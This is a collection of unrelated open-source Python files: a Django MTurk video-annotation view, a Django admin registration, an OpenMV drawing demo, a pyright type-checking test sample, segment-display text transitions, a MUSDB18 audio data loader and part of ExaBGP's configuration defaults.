if 'error' in mturk_data:
return HttpResponseForbidden(mturk_data['error'])
if not (mturk_data['authenticated'] or request.user.is_authenticated()):
return redirect('/login/?next=' + request.path)
start_time = float(request.GET['s']) if 's' in request.GET else None
end_time = float(request.GET['e']) if 'e' in request.GET else None
turk_task = get_active_video_turk_task(video.id)
    if turk_task is not None:
if turk_task.metrics != '':
metricsDictr = ast.literal_eval(turk_task.metrics)
else:
metricsDictr = {}
# Data for Javascript
full_video_task_data = {
'id': turk_task.id,
'storedMetrics': metricsDictr,
'bonus': float(turk_task.bonus),
'bonusMessage': turk_task.message,
'rejectionMessage': settings.MTURK_REJECTION_MESSAGE,
'emailSubject': settings.MTURK_EMAIL_SUBJECT,
'emailMessage': settings.MTURK_EMAIL_MESSAGE,
'isComplete': turk_task.worker_id != ''
}
# Data for python templating
        if turk_task.last_email_sent_date is not None:
mturk_data['last_email_sent_date'] = turk_task.last_email_sent_date.strftime("%Y-%m-%d %H:%M")
else:
full_video_task_data = None
mturk_data['status'] = get_mturk_status(video, turk_task)
    mturk_data['has_current_full_video_task'] = full_video_task_data is not None
video_data = json.dumps({
'id': video.id,
'location': video.url,
'path': video.host,
'is_image_sequence': True if video.image_list else False,
'annotated': video.annotation != '',
'verified': video.verified,
'rejected': video.rejected,
'start_time': start_time,
'end_time' : end_time,
'turk_task' : full_video_task_data
})
label_data = []
video_labels = video.labels.all()
if len(video_labels):
for v_label in video_labels:
label_data.append({'name': v_label.name, 'color': v_label.color})
else:
for l in labels:
label_data.append({'name': l.name, 'color': l.color})
help_content = ''
if settings.HELP_URL and settings.HELP_USE_MARKDOWN:
help_content = urllib.request.urlopen(settings.HELP_URL).read().decode('utf-8')
help_content = markdown.markdown(help_content)
response = render(request, 'video.html', context={
'label_data': label_data,
'video_data': video_data,
'image_list': list(map(urllib.parse.quote, json.loads(video.image_list))) if video.image_list else 0,
'image_list_path': urllib.parse.quote(video.host, safe='/:'),
'help_url': settings.HELP_URL,
'help_embed': settings.HELP_EMBED,
'mturk_data': mturk_data,
'iframe_mode': mturk_data['authenticated'],
'survey': False,
'help_content': help_content
})
if not mturk_data['authenticated']:
response['X-Frame-Options'] = 'SAMEORIGIN'
return response
def get_states(request, states=None):
label_name = request.GET.get('label_name')
if label_name:
label_name = label_name.replace("%20", " ")
# iterate over each city and append to results list
state_data = [{'name': s.name, 'color': s.color} for s in State.objects.filter(label_name=label_name)]
# return JSON object
return HttpResponse(json.dumps(state_data))
class AnnotationView(View):
def get(self, request, video_id):
video = Video.objects.get(id=video_id)
return HttpResponse(video.annotation, content_type='application/json')
def post(self, request, video_id):
data = json.loads(request.body.decode('utf-8'))
video = Video.objects.get(id=video_id)
video.annotation = json.dumps(data['annotation'])
video.save()
hit_id = data.get('hitId', None)
        if hit_id is not None:
if not Task.valid_hit_id(hit_id):
return HttpResponseForbidden('Not authenticated')
else:
try:
worker_id = data.get('workerId', '')
assignment_id = data.get('assignmentId', '')
task = Task.get_by_hit_id(hit_id)
task.complete(worker_id, assignment_id, data['metrics'])
except ObjectDoesNotExist:
if not settings.DEBUG:
raise
return HttpResponse('success')
class ReceiveCommand(View):
def post(self, request, video_id):
data = json.loads(request.body.decode('utf-8'))
try:
vid_id = int(video_id)
command_type = data['type']
message = data['message']
if command_type == "accept":
accept_video(request, vid_id,
data['bonus'], message,
data['reopen'],
data['delete_boxes'],
data['block_worker'],
data['updated_annotations'])
elif command_type == "reject":
reject_video(request, vid_id, message,
data['reopen'],
data['delete_boxes'],
data['block_worker'],
data['updated_annotations'])
elif command_type == "email":
email_worker(request, vid_id, data['subject'], message)
return HttpResponse(status=200)
except Exception as e:
logger.exception(e)
response = HttpResponse(status=500)
response['error-message'] = str(e)
return response
|
basic/messages/admin.py
|
neechadi/django-basic-apps
| 548 |
64832
|
<reponame>neechadi/django-basic-apps<filename>basic/messages/admin.py
from django.contrib import admin
from basic.messages.models import Message
class MessageAdmin(admin.ModelAdmin):
list_display = ('from_user', 'to_user', 'subject', 'to_status', 'from_status', 'created', 'content_type', 'object_id')
admin.site.register(Message, MessageAdmin)
|
scripts/examples/Arduino/Portenta-H7/03-Drawing/line_drawing.py
|
jiskra/openmv
| 1,761 |
64846
|
<gh_stars>1000+
# Line Drawing
#
# This example shows off drawing lines on the OpenMV Cam.
import sensor, image, time, pyb
sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE) # or RGB565...
sensor.set_framesize(sensor.QVGA) # or QQVGA...
sensor.skip_frames(time = 2000)
clock = time.clock()
while(True):
clock.tick()
img = sensor.snapshot()
for i in range(10):
x0 = (pyb.rng() % (2*img.width())) - (img.width()//2)
y0 = (pyb.rng() % (2*img.height())) - (img.height()//2)
x1 = (pyb.rng() % (2*img.width())) - (img.width()//2)
y1 = (pyb.rng() % (2*img.height())) - (img.height()//2)
r = (pyb.rng() % 127) + 128
g = (pyb.rng() % 127) + 128
b = (pyb.rng() % 127) + 128
        # If the first argument is a scalar then this method expects
# to see x0, y0, x1, and y1. Otherwise, it expects a (x0,y0,x1,y1) tuple.
img.draw_line(x0, y0, x1, y1, color = (r, g, b), thickness = 2)
print(clock.fps())
|
packages/pyright-internal/src/tests/samples/annotatedVar2.py
|
sasano8/pyright
| 4,391 |
64849
|
# This sample tests annotated types on global variables.
# This should generate an error because the declared
# type below does not match the assigned type.
glob_var1 = 4
# This should generate an error because the declared
# type doesn't match the later declared type.
glob_var1 = Exception() # type: str
glob_var1 = Exception() # type: Exception
# This should generate an error because the assigned
# type doesn't match the declared type.
glob_var1 = "hello" # type: Exception
# This should generate an error.
glob_var2 = 5
def func1():
global glob_var1
global glob_var2
# This should generate an error.
glob_var1 = 3
glob_var2 = "hello" # type: str
|
mpf/devices/segment_display/transitions.py
|
haggispinball/mpf_fathom_fast
| 163 |
64855
|
"""Text transitions used for segment displays."""
import abc
from typing import Optional, List
from mpf.core.placeholder_manager import TextTemplate
from mpf.core.rgb_color import RGBColor
from mpf.devices.segment_display.segment_display_text import SegmentDisplayText, UncoloredSegmentDisplayText
STEP_OUT_OF_RANGE_ERROR = "Step is out of range"
TRANSITION_DIRECTION_UNKNOWN_ERROR = "Transition uses an unknown direction value"
class TransitionBase(metaclass=abc.ABCMeta):
"""Base class for text transitions in segment displays."""
__slots__ = ["output_length", "config", "collapse_dots", "collapse_commas"]
def __init__(self, output_length: int, collapse_dots: bool, collapse_commas: bool, config: dict) -> None:
"""Initialize the transition."""
self.output_length = output_length
self.config = config
self.collapse_dots = collapse_dots
self.collapse_commas = collapse_commas
for key, value in config.items():
if hasattr(self, key):
setattr(self, key, value)
@abc.abstractmethod
def get_step_count(self):
"""Return the total number of steps required for the transition."""
raise NotImplementedError
# pylint: disable=too-many-arguments
@abc.abstractmethod
def get_transition_step(self, step: int, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
new_colors: Optional[List[RGBColor]] = None) -> SegmentDisplayText:
"""Calculate all the steps in the transition."""
raise NotImplementedError
class TransitionRunner:
"""Class to run/execute transitions using an iterator."""
__slots__ = ["_transition", "_step", "_current_placeholder", "_new_placeholder", "_current_colors", "_new_colors"]
# pylint: disable=too-many-arguments
def __init__(self, machine, transition: TransitionBase, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
new_colors: Optional[List[RGBColor]] = None) -> None:
"""Class initializer."""
self._transition = transition
self._step = 0
self._current_placeholder = TextTemplate(machine, current_text)
self._new_placeholder = TextTemplate(machine, new_text)
self._current_colors = current_colors
self._new_colors = new_colors
def __iter__(self):
"""Return the iterator."""
return self
def __next__(self):
"""Evaluate and return the next transition step."""
if self._step >= self._transition.get_step_count():
raise StopIteration
transition_step = self._transition.get_transition_step(self._step,
self._current_placeholder.evaluate({}),
self._new_placeholder.evaluate({}),
self._current_colors,
self._new_colors)
self._step += 1
return transition_step
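# Hedged usage sketch (illustration only; `machine` and `display` are
# assumptions, not defined in this module):
#
#   transition = PushTransition(output_length=7, collapse_dots=True,
#                               collapse_commas=True,
#                               config={'direction': 'left'})
#   for frame in TransitionRunner(machine, transition, 'OLD TXT', 'NEW TXT'):
#       display.set_text(frame)  # hypothetical hook, one frame per step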
class NoTransition(TransitionBase):
"""Segment display no transition effect."""
def get_step_count(self):
"""Return the total number of steps required for the transition."""
return 1
# pylint: disable=too-many-arguments
def get_transition_step(self, step: int, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
new_colors: Optional[List[RGBColor]] = None) -> SegmentDisplayText:
"""Calculate all the steps in the transition."""
if step < 0 or step >= self.get_step_count():
raise AssertionError(STEP_OUT_OF_RANGE_ERROR)
return SegmentDisplayText.from_str(new_text, self.output_length, self.collapse_dots, self.collapse_commas,
new_colors)
class PushTransition(TransitionBase):
"""Segment display push transition effect."""
def __init__(self, output_length: int, collapse_dots: bool, collapse_commas: bool, config: dict) -> None:
"""Class initializer."""
self.direction = 'right'
self.text = None
self.text_color = None
super().__init__(output_length, collapse_dots, collapse_commas, config)
if self.text is None:
self.text = ''
def get_step_count(self):
"""Return the total number of steps required for the transition."""
return self.output_length + len(self.text)
# pylint: disable=too-many-arguments
def get_transition_step(self, step: int, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
new_colors: Optional[List[RGBColor]] = None) -> SegmentDisplayText:
"""Calculate all the steps in the transition."""
if step < 0 or step >= self.get_step_count():
raise AssertionError(STEP_OUT_OF_RANGE_ERROR)
current_display_text = SegmentDisplayText.from_str(current_text, self.output_length, self.collapse_dots,
self.collapse_commas, current_colors)
new_display_text = SegmentDisplayText.from_str(new_text, self.output_length, self.collapse_dots,
self.collapse_commas, new_colors)
if self.text:
if new_colors and not self.text_color:
text_color = [new_colors[0]]
else:
text_color = self.text_color
transition_text = SegmentDisplayText.from_str(self.text, len(self.text), self.collapse_dots,
self.collapse_commas, text_color)
else:
transition_text = UncoloredSegmentDisplayText([], self.collapse_dots, self.collapse_commas)
if self.direction == 'right':
temp_list = new_display_text
temp_list.extend(transition_text)
temp_list.extend(current_display_text)
return temp_list[
self.output_length + len(self.text) - (step + 1):2 * self.output_length + len(
self.text) - (step + 1)]
if self.direction == 'left':
temp_list = current_display_text
temp_list.extend(transition_text)
temp_list.extend(new_display_text)
return temp_list[step + 1:step + 1 + self.output_length]
raise AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)
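# Hedged illustration (not part of the original module): with output_length=4,
# no transition text and direction 'right', the push effect slides the new
# text in from the left, one column per step:
#   step 0: N3 C0 C1 C2
#   step 1: N2 N3 C0 C1
#   step 2: N1 N2 N3 C0
#   step 3: N0 N1 N2 N3
# where N* are the new characters and C* the current ones.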
class CoverTransition(TransitionBase):
"""Segment display cover transition effect."""
def __init__(self, output_length: int, collapse_dots: bool, collapse_commas: bool, config: dict) -> None:
"""Class initializer."""
self.direction = 'right'
self.text = None
self.text_color = None
super().__init__(output_length, collapse_dots, collapse_commas, config)
if self.text is None:
self.text = ''
def get_step_count(self):
"""Return the total number of steps required for the transition."""
return self.output_length + len(self.text)
# pylint: disable=too-many-arguments
def get_transition_step(self, step: int, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
new_colors: Optional[List[RGBColor]] = None) -> SegmentDisplayText:
"""Calculate all the steps in the transition."""
if step < 0 or step >= self.get_step_count():
raise AssertionError(STEP_OUT_OF_RANGE_ERROR)
current_display_text = SegmentDisplayText.from_str(current_text, self.output_length, self.collapse_dots,
self.collapse_commas, current_colors)
new_display_text = SegmentDisplayText.from_str(new_text, self.output_length, self.collapse_dots,
self.collapse_commas, new_colors)
if self.text:
if new_colors and not self.text_color:
text_color = [new_colors[0]]
else:
text_color = self.text_color
transition_text = SegmentDisplayText.from_str(self.text, len(self.text), self.collapse_dots,
self.collapse_commas, text_color)
else:
transition_text = UncoloredSegmentDisplayText([], self.collapse_dots, self.collapse_commas)
if self.direction == 'right':
new_extended_display_text = new_display_text
new_extended_display_text.extend(transition_text)
if step < self.output_length:
temp_text = new_extended_display_text[-(step + 1):]
temp_text.extend(current_display_text[step + 1:])
else:
temp_text = new_display_text[-(step + 1):-(step + 1) + self.output_length]
return temp_text
if self.direction == 'left':
new_extended_display_text = transition_text
new_extended_display_text.extend(new_display_text)
if step < self.output_length:
temp_text = current_display_text[:self.output_length - (step + 1)]
temp_text.extend(new_extended_display_text[:step + 1])
else:
temp_text = new_extended_display_text[step - self.output_length + 1:step + 1]
return temp_text
raise AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)
class UncoverTransition(TransitionBase):
"""Segment display uncover transition effect."""
def __init__(self, output_length: int, collapse_dots: bool, collapse_commas: bool, config: dict) -> None:
"""Class initializer."""
self.direction = 'right'
self.text = None
self.text_color = None
super().__init__(output_length, collapse_dots, collapse_commas, config)
if self.text is None:
self.text = ''
def get_step_count(self):
"""Return the total number of steps required for the transition."""
return self.output_length + len(self.text)
# pylint: disable=too-many-arguments
def get_transition_step(self, step: int, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
new_colors: Optional[List[RGBColor]] = None) -> SegmentDisplayText:
"""Calculate all the steps in the transition."""
if step < 0 or step >= self.get_step_count():
raise AssertionError(STEP_OUT_OF_RANGE_ERROR)
current_display_text = SegmentDisplayText.from_str(current_text, self.output_length, self.collapse_dots,
self.collapse_commas, current_colors)
new_display_text = SegmentDisplayText.from_str(new_text, self.output_length, self.collapse_dots,
self.collapse_commas, new_colors)
if self.text:
if new_colors and not self.text_color:
text_color = [new_colors[0]]
else:
text_color = self.text_color
transition_text = SegmentDisplayText.from_str(self.text, len(self.text), self.collapse_dots,
self.collapse_commas, text_color)
else:
transition_text = UncoloredSegmentDisplayText([], self.collapse_dots, self.collapse_commas)
if self.direction == 'right':
current_extended_display_text = transition_text
current_extended_display_text.extend(current_display_text)
if step < len(self.text):
temp_text = current_extended_display_text[
len(self.text) - step - 1:len(self.text) - step - 1 + self.output_length]
else:
temp_text = new_display_text[:step - len(self.text) + 1]
temp_text.extend(current_extended_display_text[:self.output_length - len(temp_text)])
return temp_text
if self.direction == 'left':
current_extended_display_text = current_display_text
current_extended_display_text.extend(transition_text)
if step < len(self.text):
temp_text = current_extended_display_text[step + 1:step + 1 + self.output_length]
else:
temp_text = current_display_text[step + 1:]
temp_text.extend(new_display_text[-(self.output_length - len(temp_text)):])
return temp_text
raise AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)
class WipeTransition(TransitionBase):
"""Segment display wipe transition effect."""
def __init__(self, output_length: int, collapse_dots: bool, collapse_commas: bool, config: dict) -> None:
"""Class initializer."""
self.direction = 'right'
self.text = None
self.text_color = None
super().__init__(output_length, collapse_dots, collapse_commas, config)
if self.text is None:
self.text = ''
def get_step_count(self):
"""Return the total number of steps required for the transition."""
return self.output_length + len(self.text)
# pylint: disable=too-many-arguments,too-many-branches,too-many-return-statements
def get_transition_step(self, step: int, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
new_colors: Optional[List[RGBColor]] = None) -> SegmentDisplayText:
"""Calculate all the steps in the transition."""
if step < 0 or step >= self.get_step_count():
raise AssertionError(STEP_OUT_OF_RANGE_ERROR)
current_display_text = SegmentDisplayText.from_str(current_text, self.output_length, self.collapse_dots,
self.collapse_commas, current_colors)
new_display_text = SegmentDisplayText.from_str(new_text, self.output_length, self.collapse_dots,
self.collapse_commas, new_colors)
if self.text:
if new_colors and not self.text_color:
text_color = [new_colors[0]]
else:
text_color = self.text_color
transition_text = SegmentDisplayText.from_str(self.text, len(self.text), self.collapse_dots,
self.collapse_commas, text_color)
else:
transition_text = UncoloredSegmentDisplayText([], self.collapse_dots, self.collapse_commas)
if self.direction == 'right':
if step < len(self.text):
temp_text = transition_text[-(step + 1):]
temp_text.extend(current_display_text[step + 1:])
elif step < self.output_length:
temp_text = new_display_text[:step - len(self.text) + 1]
temp_text.extend(transition_text)
temp_text.extend(current_display_text[len(temp_text):])
else:
temp_text = new_display_text[:step - len(self.text) + 1]
temp_text.extend(transition_text[:self.output_length - len(temp_text)])
return temp_text
if self.direction == 'left':
if step < len(self.text):
temp_text = current_display_text[:self.output_length - (step + 1)]
temp_text.extend(transition_text[:step + 1])
elif step < self.output_length:
temp_text = current_display_text[:self.output_length - (step + 1)]
temp_text.extend(transition_text)
temp_text.extend(new_display_text[len(temp_text):])
elif step < self.output_length + len(self.text) - 1:
temp_text = transition_text[step - (self.output_length + len(self.text)) + 1:]
temp_text.extend(new_display_text[-(self.output_length - len(temp_text)):])
else:
temp_text = new_display_text
return temp_text
raise AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)
class SplitTransition(TransitionBase):
"""Segment display split transition effect."""
def __init__(self, output_length: int, collapse_dots: bool, collapse_commas: bool, config: dict) -> None:
"""Class initializer."""
self.direction = 'out'
self.mode = 'push'
super().__init__(output_length, collapse_dots, collapse_commas, config)
def get_step_count(self):
"""Return the total number of steps required for the transition."""
return int((self.output_length + 1) / 2)
# pylint: disable=too-many-arguments,too-many-branches,too-many-return-statements
def get_transition_step(self, step: int, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
new_colors: Optional[List[RGBColor]] = None) -> SegmentDisplayText:
"""Calculate all the steps in the transition."""
if step < 0 or step >= self.get_step_count():
raise AssertionError(STEP_OUT_OF_RANGE_ERROR)
current_display_text = SegmentDisplayText.from_str(current_text, self.output_length, self.collapse_dots,
self.collapse_commas, current_colors)
new_display_text = SegmentDisplayText.from_str(new_text, self.output_length, self.collapse_dots,
self.collapse_commas, new_colors)
if self.mode == 'push':
if self.direction == 'out':
if step == self.get_step_count() - 1:
return new_display_text
characters = int(self.output_length / 2)
split_point = characters
if characters * 2 == self.output_length:
characters -= 1
else:
split_point += 1
characters -= step
temp_text = current_display_text[split_point - characters:split_point]
temp_text.extend(new_display_text[characters:characters + (self.output_length - 2 * characters)])
temp_text.extend(current_display_text[split_point:split_point + characters])
return temp_text
if self.direction == 'in':
if step == self.get_step_count() - 1:
return new_display_text
split_point = int(self.output_length / 2)
characters = 1
if split_point * 2 < self.output_length:
split_point += 1
characters += step
temp_text = new_display_text[split_point - characters:split_point]
temp_text.extend(current_display_text[characters:characters + (self.output_length - 2 * characters)])
temp_text.extend(new_display_text[split_point:split_point + characters])
return temp_text
raise AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)
if self.mode == 'wipe':
if self.direction == 'out':
if step == self.get_step_count() - 1:
return new_display_text
characters = int(self.output_length / 2)
if characters * 2 == self.output_length:
characters -= 1
characters -= step
temp_text = current_display_text[:characters]
temp_text.extend(new_display_text[characters:characters + (self.output_length - 2 * characters)])
temp_text.extend(current_display_text[-characters:])
return temp_text
if self.direction == 'in':
if step == self.get_step_count() - 1:
return new_display_text
temp_text = new_display_text[:step + 1]
temp_text.extend(current_display_text[step + 1:step + 1 + (self.output_length - 2 * len(temp_text))])
temp_text.extend(new_display_text[-(step + 1):])
return temp_text
raise AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)
raise AssertionError("Transition uses an unknown mode value")
|
d3net/music-source-separation/data.py
|
ishine/ai-research-code
| 199 |
64860
|
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
MUSDB18 data-iterator code for MSS.
'''
import random
import numpy as np
import musdb
from nnabla.utils.data_source import DataSource
class Compose():
"""Composes several augmentation transforms.
Args:
augmentations: list of augmentations to compose.
"""
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, audio):
for t in self.transforms:
audio = t(audio)
return audio
def _augment_gain(audio, low=0.75, high=1.25):
"""Applies a random gain between `low` and `high`"""
g = random.uniform(low, high)
return audio * g
def _augment_channelswap(audio):
"""Swap channels of stereo signals with a probability of p=0.5"""
if audio.shape[0] == 2 and random.random() < 0.5:
return np.flip(audio, 0)
else:
return audio
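# Hedged example (illustration only): the augmentations operate on arrays of
# shape (channels, samples) and compose left to right, e.g.
#
#   aug = Compose([_augment_gain, _augment_channelswap])
#   stereo = np.random.randn(2, 44100).astype(np.float32)
#   augmented = aug(stereo)  # random gain in [0.75, 1.25], 50% channel swap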
def load_datasources(parser, args):
"""Loads the specified dataset from commandline arguments
Returns:
train_dataset, validation_dataset
"""
parser.add_argument('--is-wav', action='store_true', default=True,
help='loads wav instead of STEMS')
parser.add_argument('--samples-per-track', type=int, default=64)
parser.add_argument(
'--source-augmentations', type=str, nargs='+',
default=['gain', 'channelswap']
)
args = parser.parse_args()
source_augmentations = Compose(
[globals()['_augment_' + aug] for aug in args.source_augmentations]
)
train_dataset = MUSDBDataSource(
source_augmentations=source_augmentations, random_track_mix=True, args=args)
return train_dataset, args
class MUSDBDataSource(DataSource):
def __init__(
self,
args,
download=False,
samples_per_track=64,
source_augmentations=lambda audio: audio,
random_track_mix=False,
dtype=np.float32,
seed=42,
rng=None
):
"""
MUSDB18 nnabla.utils.data_source that samples from the MUSDB tracks
using track and excerpts with replacement.
Parameters
----------
args : additional arguments used to add further control for
the musdb dataset initialization function.
download : boolean
automatically download 7s preview version of MUS
samples_per_track : int
sets the number of samples, yielded from each track per epoch.
Defaults to 64
source_augmentations : list[callables]
provide list of augmentation function that take a multi-channel
audio file of shape (src, samples) as input and output. Defaults to
no-augmentations (input = output)
random_track_mix : boolean
randomly mixes sources from different tracks to assemble a
            custom mix. This augmentation is only applied for the train subset.
seed : int
control randomness of dataset iterations
dtype : numeric type
            data type of the output tuple x and y
"""
super(MUSDBDataSource, self).__init__(shuffle=True)
if rng is None:
rng = np.random.RandomState(seed)
self.rng = rng
random.seed(seed)
self.args = args
self.download = args.root is None
self.samples_per_track = samples_per_track
self.source_augmentations = source_augmentations
self.random_track_mix = random_track_mix
self.mus = musdb.DB(
root=args.root,
is_wav=args.is_wav,
split=None,
subsets='train',
download=download
)
print(f"Finished loading dataset with {len(self.mus.tracks)} tracks.")
self.sample_rate = 44100 # musdb has fixed sample rate
self.dtype = dtype
self._size = len(self.mus.tracks) * self.samples_per_track
self._variables = ('mixture', 'target')
self.reset()
def _get_data(self, position):
index = self._indexes[position]
audio_sources = []
target_ind = None
# select track
track = self.mus.tracks[index // self.samples_per_track]
# at training time we assemble a custom mix
if self.args.seq_dur:
for k, source in enumerate(self.mus.setup['sources']):
# memorize index of target source
if source == self.args.target:
target_ind = k
# select a random track
if self.random_track_mix:
track = random.choice(self.mus.tracks)
# set the excerpt duration
track.chunk_duration = self.args.seq_dur
# set random start index
track.chunk_start = random.uniform(
0, track.duration - self.args.seq_dur
)
# load source audio and apply time domain source_augmentations
audio = track.sources[source].audio.T
audio = self.source_augmentations(audio)
audio_sources.append(audio)
# create stem tensor of shape (source, channel, samples)
stems = np.stack(audio_sources, axis=0)
            # apply linear mix over source index=0
x = np.sum(stems, axis=0)
# get the target stem
if target_ind is not None:
y = stems[target_ind]
# assuming vocal/accompaniment scenario if target!=source
else:
vocind = list(self.mus.setup['sources'].keys()).index('vocals')
# apply time domain subtraction
y = x - stems[vocind]
# for validation and test, we deterministically yield the full musdb track
else:
# get the non-linear source mix straight from musdb
x = track.audio.T
y = track.targets[self.args.target].audio.T
return x, y
def reset(self):
if self._shuffle:
self._indexes = self.rng.permutation(self._size)
else:
self._indexes = np.arange(self._size)
super(MUSDBDataSource, self).reset()
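# Hedged usage sketch (illustration only; assumes a local MUSDB18 copy and the
# --root/--target/--seq-dur flags that the training script is expected to add):
#
#   parser = argparse.ArgumentParser()
#   parser.add_argument('--root')
#   parser.add_argument('--target', default='vocals')
#   parser.add_argument('--seq-dur', type=float, default=6.0)
#   train_data, args = load_datasources(parser, None)
#   mixture, target = train_data._get_data(0)  # (channels, samples) arrays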
|
src/exabgp/environment/setup.py
|
pierky/exabgp
| 1,560 |
64901
|
<reponame>pierky/exabgp<filename>src/exabgp/environment/setup.py<gh_stars>1000+
# encoding: utf-8
"""
setup.py
Created by <NAME> on 2014-12-23.
Copyright (c) 2014-2017 Exa Networks. All rights reserved.
License: 3-clause BSD. (See the COPYRIGHT file)
"""
from exabgp.environment import parsing
from exabgp.environment.environment import Env
_SPACE = {'space': ' ' * 33}
LOGGING_HELP_STDOUT = (
"""\
where logging should log
%(space)s syslog (or no setting) sends the data to the local syslog syslog
%(space)s host:<location> sends the data to a remote syslog server
%(space)s stdout sends the data to stdout
%(space)s stderr sends the data to stderr
%(space)s <filename> send the data to a file"""
% _SPACE
)
CONFIGURATION = {
'profile': {
'enable': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'toggle profiling of the code',
},
'file': {
'read': parsing.unquote,
'write': parsing.quote,
'value': '',
'help': 'profiling result file, none means stdout, no overwriting',
},
},
'pdb': {
'enable': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'on program fault, start pdb the python interactive debugger',
}
},
'daemon': {
'pid': {
'read': parsing.unquote,
'write': parsing.quote,
'value': '',
'help': 'where to save the pid if we manage it',
},
'user': {
'read': parsing.user,
'write': parsing.quote,
'value': 'nobody',
'help': 'user to run the program as',
},
'daemonize': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'should we run in the background',
},
'drop': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'drop privileges before forking processes',
},
'umask': {
'read': parsing.umask_read,
'write': parsing.umask_write,
'value': '0137',
'help': 'run daemon with this umask, governs perms of logfiles etc.',
},
},
'log': {
'enable': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'enable logging to file or syslog',
},
'level': {
'read': parsing.syslog_value,
'write': parsing.syslog_name,
'value': 'INFO',
'help': 'log message with at least the priority SYSLOG.<level>',
},
'destination': {
'read': parsing.unquote,
'write': parsing.quote,
'value': 'stdout',
'help': LOGGING_HELP_STDOUT,
},
'all': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'report debug information for everything',
},
'configuration': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'report command parsing',
},
'reactor': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'report signal received, command reload',
},
'daemon': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'report pid change, forking, ...',
},
'processes': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'report handling of forked processes',
},
'network': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'report networking information (TCP/IP, network state,...)',
},
'packets': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'report BGP packets sent and received',
},
'rib': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'report change in locally configured routes',
},
'message': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'report changes in route announcement on config reload',
},
'timers': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'report keepalives timers',
},
'routes': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'report received routes',
},
'parser': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'report BGP message parsing details',
},
'short': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'use short log format (not prepended with time,level,pid and source)',
},
},
'tcp': {
'once': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
            'help': 'only one tcp connection attempt per peer (for debugging scripts)',
},
'delay': {
'read': parsing.integer,
'write': parsing.nop,
'value': '0',
'help': 'start to announce route when the minutes in the hours is a modulo of this number',
},
'bind': {
'read': parsing.ip_list,
'write': parsing.quote_list,
'value': '',
'help': 'Space separated list of IPs to bind on when listening (no ip to disable)',
},
'port': {
'read': parsing.integer,
'write': parsing.nop,
'value': '179',
'help': 'port to bind on when listening',
},
'acl': {
'read': parsing.boolean,
'write': parsing.lower,
'value': '',
'help': '(experimental please do not use) unimplemented',
},
},
'bgp': {
'passive': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'ignore the peer configuration and make all peers passive',
},
'openwait': {
'read': parsing.integer,
'write': parsing.nop,
'value': '60',
'help': 'how many seconds we wait for an open once the TCP session is established',
},
},
'cache': {
'attributes': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'cache all attributes (configuration and wire) for faster parsing',
},
'nexthops': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'cache routes next-hops (deprecated: next-hops are always cached)',
},
},
'api': {
'ack': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'acknowledge api command(s) and report issues',
},
'chunk': {
'read': parsing.integer,
'write': parsing.nop,
'value': '1',
'help': 'maximum lines to print before yielding in show routes api',
},
'encoder': {
'read': parsing.api,
'write': parsing.lower,
'value': 'json',
            'help': '(experimental) default encoder to use with external API (text or json)',
},
'compact': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'shorter JSON encoding for IPv4/IPv6 Unicast NLRI',
},
'respawn': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
            'help': 'should we try to respawn helper processes if they die',
},
'terminate': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'should we terminate ExaBGP if any helper process dies',
},
'cli': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'should we create a named pipe for the cli',
},
'pipename': {
'read': parsing.unquote,
'write': parsing.quote,
'value': 'exabgp',
'help': 'name to be used for the exabgp pipe',
},
},
'reactor': {
'speed': {
'read': parsing.real,
'write': parsing.nop,
'value': '1.0',
